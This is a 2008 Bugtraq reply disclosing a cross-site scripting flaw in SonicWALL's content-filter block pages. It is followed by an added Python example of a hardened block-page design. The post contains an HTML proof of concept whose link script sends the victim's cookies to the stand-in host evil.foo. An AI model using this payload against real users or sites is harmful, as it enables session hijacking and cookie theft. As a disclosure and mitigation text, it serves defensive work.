Message-Id: <200811050757.mA57vg71003479@www5.securityfocus.com>
Date: Wed, 5 Nov 2008 00:57:42 -0700
From: unknown.pentester@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: Re: Re: [Full-disclosure] Universal Website Hijacking by
Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day
It is universal because any domain/website can be hijacked, not because all vendors are affected! I never claimed that all vendors are affected.
Also, the SonicWALL vuln you mentioned is NOT the same issue! That vuln affects the web logs console of the appliance which means that exploitation is aimed at compromising the *device* NOT websites the victim user visits.
Notice that the advisory says:
"the attacker may execute scripts automatically when the logfile is viewed."
The vuln I reported allows you to hijack any site. i.e.: run scripting code within the security context of any website. In other words, it's not a vulnerability that can be used to compromise the SonicWALL appliance, but rather to steal information from any sites (i.e.: active webmail session), steal cookies, etc ...
Furthermore, the targeted website doesn't have to be blacklisted (i.e.: adware site), but rather *swearing terms* need to be blocked. By simply inserting a swearing term (notice the f word) into any site's URL, script injection within that site is possible. i.e.:
<html><head><title>SonicWall Universal XSS PoC</title></head>
<body>
<h2>SonicWall Universal XSS PoC</h2>
<a href="http://google.com/fuck#<script>location='http://evil.foo/
'+document.cookie</script>">Click me!</a>
</body></html>
That's because the SonicWALL appliance replies on behalf of the requested site, so the browser "believes" that the inserted script is actually returned by the requested website. You could think of this as a MITM XSS.
Hope it makes sense.
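
The mitigation side of the behaviour described in the message above, as an added example that is not part of the original post and is not SonicWALL code. It assumes the block page echoes the requested URL into its HTML; the `block.filter.example` hostname, the function names and the sample URL are hypothetical.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Assumption: a hostname owned by the filter and used only for block pages.
BLOCK_ORIGIN = "http://block.filter.example"


def unsafe_inplace_reply(requested_url):
    """Pattern described in the post: the filter answers as the requested
    site and echoes the URL verbatim, so markup inside the URL is parsed
    as HTML in that site's origin."""
    return "<html><body><p>Blocked: %s</p></body></html>" % requested_url


def redirect_to_block_origin(requested_url):
    """Hardened step 1: never reply as the requested site. Redirect to the
    filter's own origin, carrying the URL fully percent-encoded."""
    location = "%s/blocked?u=%s" % (BLOCK_ORIGIN, quote(requested_url, safe=""))
    return 302, {"Location": location, "Cache-Control": "no-store"}


def render_block_page(block_page_url):
    """Hardened step 2: the page served from BLOCK_ORIGIN HTML-escapes the
    URL before placing it in the document, so it is shown as text."""
    blocked = parse_qs(urlsplit(block_page_url).query).get("u", [""])[0]
    return ("<html><body><p>Blocked: %s</p></body></html>"
            % html.escape(blocked, quote=True))


# Constructed sample input (not taken from the original post).
SAMPLE = "http://site.example/blockedword#<script>x()</script>"

if __name__ == "__main__":
    print(unsafe_inplace_reply(SAMPLE))
    status, headers = redirect_to_block_origin(SAMPLE)
    print(status, headers["Location"])
    print(render_block_page(headers["Location"]))
```

With both steps in place, any markup that survives would run in the filter's origin instead of the requested site's, and the escaping keeps it from running at all.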